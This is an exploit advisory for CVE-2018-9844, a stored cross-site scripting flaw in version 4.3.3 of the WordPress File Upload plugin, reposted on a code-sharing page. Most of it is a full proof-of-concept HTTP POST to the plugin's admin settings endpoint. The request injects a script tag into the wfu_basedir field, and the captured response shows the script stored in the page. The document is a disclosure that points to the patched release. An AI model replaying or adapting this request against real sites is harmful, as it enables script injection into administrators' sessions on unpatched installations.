扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 |
# Exploit Title: WordPress Plugin WordPress File Upload 4.3.3 - Stored XSS # Date: 06/04/2018 # Exploit Author: ManhNho # Vendor Homepage: https://www.iptanus.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-file-upload.zip # Version: 4.3.3 # Tested on: Windows 7 / Cent OS 6.5 # CVE : CVE-2018-9844 # Category : Webapps Description =========== WordPress File Upload is a WordPress plugin with more than 20.000 active installations. Version 4.3.3 (and possibly previous versions) are affected by a Stored XSS vulnerability in the admin panel ,related to the "Edit_Setting" functionality. PoC =============== Request: POST /wp-admin/options-general.php?page=wordpress_file_upload&action=edit_settings HTTP/1.1 Host: 192.168.1.66 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.1.66/wp-admin/options-general.php?page= wordpress_file_upload&action=plugin_settings Content-Type: multipart/form-data; boundary=--------------------- ------27678165033834 Content-Length: 906 Cookie: wordpress_ce39b1fa1561a0e8d46e02ff9e65f6a0=admin%7C1523124759% 7CYpPsz6ePz7L52pKrUk6uFioJlynhadnrSuv2lKQNhJe%7Ca3c7a75afaaf9ce1db3596b8aa83 3adeb337f313ef5156fbf93096c1af0cdbbc; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1522504284; PHPSESSID=o6smfv1u6p8rh7cu7v7gl9lm47; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_ ce39b1fa1561a0e8d46e02ff9e65f6a0=admin%7C1523124759% 7CYpPsz6ePz7L52pKrUk6uFioJlynhadnrSuv2lKQNhJe%7C1993c93121805782b8bee82cd013 6f1a6aa286d4294ed58cb6f95539acdfe5d5 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------27678165033834 Content-Disposition: form-data; name="_wpnonce" c9d5733e36 -----------------------------27678165033834 Content-Disposition: form-data; name="_wp_http_referer" /wp-admin/options-general.php?page=wordpress_file_upload& action=plugin_settings -----------------------------27678165033834 Content-Disposition: form-data; name="action" edit_settings -----------------------------27678165033834 Content-Disposition: form-data; name="wfu_basedir" <script>alert('XSS')</script> -----------------------------27678165033834 Content-Disposition: form-data; name="wfu_postmethod" fopen -----------------------------27678165033834 Content-Disposition: form-data; name="wfu_admindomain" siteurl -----------------------------27678165033834 Content-Disposition: form-data; name="submitform" Update -----------------------------27678165033834-- Response: HTTP/1.1 200 OK Date: Thu, 05 Apr 2018 18:15:01 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 28623 ... <input name="wfu_basedir" id="wfu_basedir" type="text" value="<script>alert('XSS')</script>" /> <p style="cursor: text; font-size:9px; padding: 0px; margin: 0px; width: 95%; color: #AAAAAA;">Current value: <strong><script>alert('XSS')</ script></strong></p> ... References =============== <blockquote class="wp-embedded-content" data-secret="RgqaFkz0y3"><a href="https://www.iptanus.com/new-version-4-3-4-of-wordpress-file-upload-plugin/" target="_blank"rel="external nofollow" class="external" >New Version 4.3.4 of WordPress File Upload Plugin</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“New Version 4.3.4 of WordPress File Upload Plugin” — Iptanus" src="https://www.iptanus.com/new-version-4-3-4-of-wordpress-file-upload-plugin/embed/#?secret=MmxiDVZeLV#?secret=RgqaFkz0y3" data-secret="RgqaFkz0y3" frameborder="0" marginmarginscrolling="no"></iframe> <blockquote class="wp-embedded-content" data-secret="jHtUg5rjuA"><a href="https://wordpress.org/plugins/wp-file-upload/" target="_blank"rel="external nofollow" class="external" >WordPress File Upload</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“WordPress File Upload” — Plugin Directory" src="https://wordpress.org/plugins/wp-file-upload/embed/#?secret=UnZgufqQfY#?secret=jHtUg5rjuA" data-secret="jHtUg5rjuA" frameborder="0" marginmarginscrolling="no"></iframe> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9844 |
体验盒子
